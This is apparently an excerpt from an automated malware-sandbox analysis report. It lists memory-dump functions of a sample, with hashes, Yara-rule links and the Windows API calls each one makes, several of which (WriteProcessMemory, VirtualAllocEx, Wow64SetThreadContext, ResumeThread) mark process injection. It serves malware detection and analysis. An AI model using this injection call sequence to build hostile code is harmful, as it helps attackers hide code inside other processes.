                                            APIs
                                            • DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,0720518D,?,?), ref: 0720523F
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277333950.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_7200000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DrawText
                                            • String ID:
                                            • API String ID: 2175133113-0
                                            • Opcode ID: 7f53551b183e66486a94d9fd1645d91cec7775191fb74d2ccccfa5efd4d395d6
                                            • Instruction ID: e89aeb7c8435869d55342d61442e180a30772f562ea8f4b43f62cc7bca01bc52
                                            • Opcode Fuzzy Hash: 7f53551b183e66486a94d9fd1645d91cec7775191fb74d2ccccfa5efd4d395d6
                                            • Instruction Fuzzy Hash: 82214AB6900209AFDB00CF99D840A9EBBF5EF58320F18841AE919A7251C375E550DFA0
                                            Function 06E44EB0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06E44F40
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessWrite
                                            • String ID:
                                            • API String ID: 3559483778-0
                                            • Opcode ID: c09371826c55bd04a98b2ffa3aa4e1e5dad30ccf394381919b501d96b83f03f3
                                            • Instruction ID: adce2527f2d739800678d064a47c88e7cea1e813dc575f7a4ee1463a82f38ee7
                                            • Opcode Fuzzy Hash: c09371826c55bd04a98b2ffa3aa4e1e5dad30ccf394381919b501d96b83f03f3
                                            • Instruction Fuzzy Hash: 1B21F4B59003599FDB10DFAAC885BEEBBF5FF48314F10842AE919A7250C7789944CBA4
                                            Function 06E44F99 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E45020
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: b86bd8e9b968eaff8211b0fda26205124ba566678e94aaf51c26a365301c3203
                                            • Instruction ID: 86316b54aa6ff98c98e43840d9bb68fb8a6b1bf5363592555d712de4b6927af7
                                            • Opcode Fuzzy Hash: b86bd8e9b968eaff8211b0fda26205124ba566678e94aaf51c26a365301c3203
                                            • Instruction Fuzzy Hash: A12127B58003499FCB10DFAAC841AEEFBF5FF48310F108429E958A3250D7399941CBA1
                                            Function 06E448D8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4495E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: adad9ce824278af59e6b02bcaf52fdd0eef6b27633db82b2d99457f72960fbe4
                                            • Instruction ID: aae91a0429d6831b137f40b77b6ba8628a63082f7b06c5f5ad22f95d82e0682c
                                            • Opcode Fuzzy Hash: adad9ce824278af59e6b02bcaf52fdd0eef6b27633db82b2d99457f72960fbe4
                                            • Instruction Fuzzy Hash: A12165B5D003098FDB10DFAAC4857EEBBF4EF88314F14842AD559A7280CB789945CFA0
                                            Function 0119D27C Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: 751627440b2e494bbfa3df15aa9d49f23170b3ea557aea2117069b514b0b54ad
                                            • Instruction ID: 610a3a8cda7487ef3023d725da5c578b339733d7ecf13c5c11cb6590c0d90b99
                                            • Opcode Fuzzy Hash: 751627440b2e494bbfa3df15aa9d49f23170b3ea557aea2117069b514b0b54ad
                                            • Instruction Fuzzy Hash: 3221E5B59003489FDB14CF9AD584AEEBBF5FB48310F14841AE918A7350D378A950CFA5
                                            Function 0119D689 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                            Download Yara Rule
                                            APIs
                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0119D656,?,?,?,?,?), ref: 0119D717
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: DuplicateHandle
                                            • String ID:
                                            • API String ID: 3793708945-0
                                            • Opcode ID: ba8be02bd8ad0800dc00ebdf401c620eec47382aea6d607ae2d5da2f541ead24
                                            • Instruction ID: 359dba182473a7dd20f0499b644d55c513b8901d6c7fe69ea6318038e9c72c48
                                            • Opcode Fuzzy Hash: ba8be02bd8ad0800dc00ebdf401c620eec47382aea6d607ae2d5da2f541ead24
                                            • Instruction Fuzzy Hash: 2E21E3B59002489FDB10CFAAD584ADEBBF9FB48314F14801AE918A3350D378A940CFA5
                                            Function 06E44FA0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06E45020
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MemoryProcessRead
                                            • String ID:
                                            • API String ID: 1726664587-0
                                            • Opcode ID: 87034f361062e7c44d2761430eeaeff7af31239e33b9cd10829335731858970d
                                            • Instruction ID: 89acdd5531406a4c72a5a6f94885487a399f215384e18938ae9a50e13ebf5785
                                            • Opcode Fuzzy Hash: 87034f361062e7c44d2761430eeaeff7af31239e33b9cd10829335731858970d
                                            • Instruction Fuzzy Hash: FE2125B5C003499FCB10DFAAC881AEEFBF5FF48310F10842AE919A7250D7789940CBA0
                                            Function 06E448E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06E4495E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: e5d25d50f3275ae0cb775522f8f558445f952ce9b425b6ca68dbd00996415e25
                                            • Instruction ID: 22c16ef312687578631126551003cf13d0b90efd549477faea691ac37624ea3e
                                            • Opcode Fuzzy Hash: e5d25d50f3275ae0cb775522f8f558445f952ce9b425b6ca68dbd00996415e25
                                            • Instruction Fuzzy Hash: 4B2147B1D003098FDB10DFAAC5857EEBBF4EF88314F14842AD559A7280CB78A945CFA0
                                            Function 06E44DE8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E44E5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: b9eb4c51ffa6fccd7987cf8f787f9b8f328bdee14eaa3a519345993cf90bac1d
                                            • Instruction ID: 23f293829c4bd2937019e33a3419e6b9b36c27a7ff7cfbce503bc51eac4dbe77
                                            • Opcode Fuzzy Hash: b9eb4c51ffa6fccd7987cf8f787f9b8f328bdee14eaa3a519345993cf90bac1d
                                            • Instruction Fuzzy Hash: 2B1159759002499FCB10DFAAD845BEEBFF5EF88324F148419D919A7250C7359941CFA1
                                            Function 0119A130 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119B079,00000800,00000000,00000000), ref: 0119B28A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: a52d74dd23f31e2dfe36e8e678e620e0f74efde966e84dcd806b266860f05473
                                            • Instruction ID: cb90d942c5b7184e8be5c7db4000b41246783f760b493a87e287ae99bf586a9a
                                            • Opcode Fuzzy Hash: a52d74dd23f31e2dfe36e8e678e620e0f74efde966e84dcd806b266860f05473
                                            • Instruction Fuzzy Hash: 961126B68043089FDB14CF9AD444ADEFBF4EB48710F10846EE529B7210C379A545CFA9
                                            Function 0119B218 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0119B079,00000800,00000000,00000000), ref: 0119B28A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: LibraryLoad
                                            • String ID:
                                            • API String ID: 1029625771-0
                                            • Opcode ID: d43e3ad08b62c85c8d44099267a943696a755d46477b50cc813c97850a0a3443
                                            • Instruction ID: 310d2d4c91a2c0baa64c72fa3a932b197bf81a51e9943eb7541809d1f9fad9aa
                                            • Opcode Fuzzy Hash: d43e3ad08b62c85c8d44099267a943696a755d46477b50cc813c97850a0a3443
                                            • Instruction Fuzzy Hash: 201123B68043099FDB14CF9AD484ADEFBF4FF48310F10846AE529A7210C379A545CFA9
                                            Function 06E44DF0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06E44E5E
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: 94c7e2a956913b854b4f93e90e909744e0748a6c14deed1df100ebe269939073
                                            • Instruction ID: 63932022033cd9f5450d9d09bd825c7390a3ca0d2953ec524de0639c38254306
                                            • Opcode Fuzzy Hash: 94c7e2a956913b854b4f93e90e909744e0748a6c14deed1df100ebe269939073
                                            • Instruction Fuzzy Hash: 651126759002499FCB10DFAAD845AEEBBF5EF88324F148419E519A7250C779A940CFA0
                                            Function 06E443F1 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 06E4445A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: a779d47facb8b92346b4b6818e41452dfa91ae08a355235aba2f948d09688f89
                                            • Instruction ID: f0542c456ebdae2707e801ca20600752655d66eeebcc1ab7eef3ee64e4786ef7
                                            • Opcode Fuzzy Hash: a779d47facb8b92346b4b6818e41452dfa91ae08a355235aba2f948d09688f89
                                            • Instruction Fuzzy Hash: C31143B1D003498FDB20EFAAC4457AEFBF5EF88324F248419D559A7250CB39A941CFA4
                                            Function 06E443F8 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • ResumeThread.KERNELBASE(?), ref: 06E4445A
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: 4395de01e616d5f4dbd14538d8a7e7c76abc27801ff821e440d86c3411453c83
                                            • Instruction ID: 6d037bba78cba2212b70d33ae0e0fc266819733d7b626dbe576f82bde9c83e51
                                            • Opcode Fuzzy Hash: 4395de01e616d5f4dbd14538d8a7e7c76abc27801ff821e440d86c3411453c83
                                            • Instruction Fuzzy Hash: DF1125B1D003488BCB20DFAAD4457AEFBF5EF88324F248419D519A7250CB79A945CFA4
                                            Function 06E463A4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E48AED
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 7a32fdb8a1f53cff5db36d0931a700a4f3cbdee8d8943d81502b49ecc7c6ea43
                                            • Instruction ID: 29d0dee5671c5eaabc2c18cb80b0bef16160ec23c31fbf361dfc847bb5982bd1
                                            • Opcode Fuzzy Hash: 7a32fdb8a1f53cff5db36d0931a700a4f3cbdee8d8943d81502b49ecc7c6ea43
                                            • Instruction Fuzzy Hash: B91106B58003499FDB50DF9AD445BDFBBF8EB48310F108459E919A7250C375A944CFA1
                                            Function 0119AF98 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 0119AFFE
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2259653737.0000000001190000.00000040.00000800.00020000.00000000.sdmp, Offset: 01190000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_1190000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: HandleModule
                                            • String ID:
                                            • API String ID: 4139908857-0
                                            • Opcode ID: 3ca9a6ab3f07111dd2d91d059d65dd2bdca4f43a03bcc39e85c7b4c9dba2648c
                                            • Instruction ID: 93e97ef890f520f76895a555a40ff16ebecd68515fbb719890b5680e81e3fbb8
                                            • Opcode Fuzzy Hash: 3ca9a6ab3f07111dd2d91d059d65dd2bdca4f43a03bcc39e85c7b4c9dba2648c
                                            • Instruction Fuzzy Hash: D71110B6C003498FDB14CF9AD444ADEFBF4EF88314F14841AD928A7210C379A545CFA5
                                            Function 06E48A8B Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 06E48AED
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2276946660.0000000006E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E40000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_6e40000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID: MessagePost
                                            • String ID:
                                            • API String ID: 410705778-0
                                            • Opcode ID: 5d522e88327e8588d618243e00573f5b146399e76ac2945d52bd3515409ecc64
                                            • Instruction ID: 5f57f24f2ab92d22b8a58764c6b3219f56149446166a8d754fe2f32b5f86e55f
                                            • Opcode Fuzzy Hash: 5d522e88327e8588d618243e00573f5b146399e76ac2945d52bd3515409ecc64
                                            • Instruction Fuzzy Hash: 3411F2B58003498FDB10DF99D585BDEBBF8EF48320F14844AD958A7250C378A584CFA0
                                            Function 084949CF Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: aj^
                                            • API String ID: 0-2778040283
                                            • Opcode ID: 9158a532190913e28e67d177f5e2ed2b1ffe23c7265df7b34752c8e9e55ecef4
                                            • Instruction ID: 8b48d4165fb948f4bf8d70622e929db06a22c172376bc83f77cd10058cb9644d
                                            • Opcode Fuzzy Hash: 9158a532190913e28e67d177f5e2ed2b1ffe23c7265df7b34752c8e9e55ecef4
                                            • Instruction Fuzzy Hash: BD31902289E3E19FD7036B7899704D53FB4AD5722471A00E7C0D0CE0B7E65C898DC7AA
                                            Function 08497180 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Haq
                                            • API String ID: 0-725504367
                                            • Opcode ID: f6896da6215aac39e5e581a4c6d940249c94a98392489c206c877c86b9dc492a
                                            • Instruction ID: 95e35f67319b49253a544c6666add8d69c2dfa36f564989dea16276ee6e3ea60
                                            • Opcode Fuzzy Hash: f6896da6215aac39e5e581a4c6d940249c94a98392489c206c877c86b9dc492a
                                            • Instruction Fuzzy Hash: 8821D5706183809FE7368F28EC52B6B7FB8EB91705F054567F0828A282E7789945C761
                                            Function 08499B90 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Te]q
                                            • API String ID: 0-52440209
                                            • Opcode ID: 2e0e9e2db4ac5d19d30b340e7875c1faf0917e602ffcb87c10cca244fb85dfa5
                                            • Instruction ID: 0338e2c38e6da7a97cc489dcb43342768db10f9f792cb1f53bba65c51d78d107
                                            • Opcode Fuzzy Hash: 2e0e9e2db4ac5d19d30b340e7875c1faf0917e602ffcb87c10cca244fb85dfa5
                                            • Instruction Fuzzy Hash: B9114F31F0021A8BCF58EBA999105EFBFF6ABD8611B20406EC545E7344EB358D02C795
                                            Function 08490040 Relevance: .2, Instructions: 219COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7537d7111e5f645db6f4dcab98b453cdccd3952c9a09476f763d63b406e3a4d0
                                            • Instruction ID: 0f0838d351c96bc98f29ec8977b2e22e9d7b27c589bb4b68c23e85f07446a413
                                            • Opcode Fuzzy Hash: 7537d7111e5f645db6f4dcab98b453cdccd3952c9a09476f763d63b406e3a4d0
                                            • Instruction Fuzzy Hash: A6812638710610CFCB18EF68D59896A7BF6FF89605B1541AAE502CB375DB71EC41CB90
                                            Function 0849BBF8 Relevance: .2, Instructions: 214COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3ee3c649828be72c871f71b60d2cfdcc54ef2cc7929e81dda184d8fc6dcd0dfa
                                            • Instruction ID: 1d58f6ccaf8c321b5e460687c29dbb8e0e65cdb743fda5cdc6fb922904f0c066
                                            • Opcode Fuzzy Hash: 3ee3c649828be72c871f71b60d2cfdcc54ef2cc7929e81dda184d8fc6dcd0dfa
                                            • Instruction Fuzzy Hash: 03710930A097A48FCB314F69E85577ABFB5EF46321F4449BFD1D68B293C6288902C752
                                            Function 0849A148 Relevance: .2, Instructions: 189COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 10f2b9b1cb41e44a0b71541051121225026b838ee536b4708e41408ecf415037
                                            • Instruction ID: f0f1cde493054263972700bdbf9eeef5a3a7869c61f6e578f7e6da952b6f582c
                                            • Opcode Fuzzy Hash: 10f2b9b1cb41e44a0b71541051121225026b838ee536b4708e41408ecf415037
                                            • Instruction Fuzzy Hash: 7771D170E05264DFCF21CFA8C8859AEBFF2EF45302F05816BE5969B2A2D7348941CB51
                                            Function 084975D9 Relevance: .2, Instructions: 176COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61b0325b25a6f324effa9021c946bc102b76a513ffc12f5130eea1e4cf550283
                                            • Instruction ID: 2c40c1abc2974cace6a21fd2416fd728998934db6646e253b9c3e06761894bb2
                                            • Opcode Fuzzy Hash: 61b0325b25a6f324effa9021c946bc102b76a513ffc12f5130eea1e4cf550283
                                            • Instruction Fuzzy Hash: 2A715031A15205CFCF24CF5CC584E69BBB2FB44326F168A9BD0959B6A6C374EC41CB94
                                            Function 08492DB0 Relevance: .2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2ac4283c4f44913c34457eecbb2f624876f40cf23fba3b533b964f4c6c645f91
                                            • Instruction ID: 37d7e6798265ce11a4fc1308bd2ed1f699a37b7c6bbe6ef278dd5a5f126c9541
                                            • Opcode Fuzzy Hash: 2ac4283c4f44913c34457eecbb2f624876f40cf23fba3b533b964f4c6c645f91
                                            • Instruction Fuzzy Hash: 7951353090A264EFCF299B3CD48466BBFB1EF45322F04459BD0959F287CAB89845C7A5
                                            Function 08494ACC Relevance: .2, Instructions: 164COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 936ea2fcfe601755a5f5e6519ef4fb80be4563e5678b8bb696c5f436bc682f2f
                                            • Instruction ID: 8bb58f82d91e945e1be415396657d11239b9d20c88694bf0bec944d06fd9f7a6
                                            • Opcode Fuzzy Hash: 936ea2fcfe601755a5f5e6519ef4fb80be4563e5678b8bb696c5f436bc682f2f
                                            • Instruction Fuzzy Hash: D051D76194E3D14FCB039B785C744EA7FB69E9322070A45DBD0D1CB293EA688D09C7A6
                                            Function 0849ACE9 Relevance: .2, Instructions: 150COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c761be18776415061ce6cfa5d802546dde6fb4ed47aa6a02c7d34fde8a147ddc
                                            • Instruction ID: 22ab5042c7a3e19e54933eb596f5197596713243fd92c1ebacd50fa12d12e142
                                            • Opcode Fuzzy Hash: c761be18776415061ce6cfa5d802546dde6fb4ed47aa6a02c7d34fde8a147ddc
                                            • Instruction Fuzzy Hash: BB519F30B00219DFDF14DFA9C951BAEBAF2AB88711F108526E552AB3D5DA348D42C791
                                            Function 0849EC80 Relevance: .1, Instructions: 144COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64e5137b99838e4a907cbc575c124da855fbf9b19d46fa471dc3bfe6f02016d5
                                            • Instruction ID: b33f49ca7148cf1b04d589d2d2cb7004c1d242f20726af9029276cd9e7a90adf
                                            • Opcode Fuzzy Hash: 64e5137b99838e4a907cbc575c124da855fbf9b19d46fa471dc3bfe6f02016d5
                                            • Instruction Fuzzy Hash: 0A516A74D09209CFDF18CFAAC4446EEBFFAAB8D302F14D26AE499A3251D7744941CB64
                                            Function 08496478 Relevance: .1, Instructions: 130COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: ab9ff2ad8101aa5d32dff221b48a41e9b19b1ec350554bbf90bfd8f2ac7661fd
                                            • Instruction ID: 6998804477e6d6a95daf28f7c2f9c926774c07277185a6b23e1e80d10b995cc0
                                            • Opcode Fuzzy Hash: ab9ff2ad8101aa5d32dff221b48a41e9b19b1ec350554bbf90bfd8f2ac7661fd
                                            • Instruction Fuzzy Hash: 5741E571E09294CFCB218B6C950066ABFE1AF52316F5B80ABD0E5CB256CB35C843CB55
                                            Function 084978F7 Relevance: .1, Instructions: 128COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.2277561655.0000000008490000.00000040.00000800.00020000.00000000.sdmp, Offset: 08490000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_8490000_GRogNEHvcL.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 74dacf7a6a6ef56a443f6d3b1d53609bc8900dbda1d1ab2fc142b8def1a8dec9
                                            • Instruction ID: 6f8592ec83c7d38f266fb0681ab7b59966e950473f224d20ea70a74b169f52d9
                                            • Opcode Fuzzy Hash: 74dacf7a6a6ef56a443f6d3b1d53609bc8900dbda1d1ab2fc142b8def1a8dec9
                                            • Instruction Fuzzy Hash: 48516B30E64204DBEF24CF69D9587BEBFF1EF54306F148167E492AA291C7388A42DB51
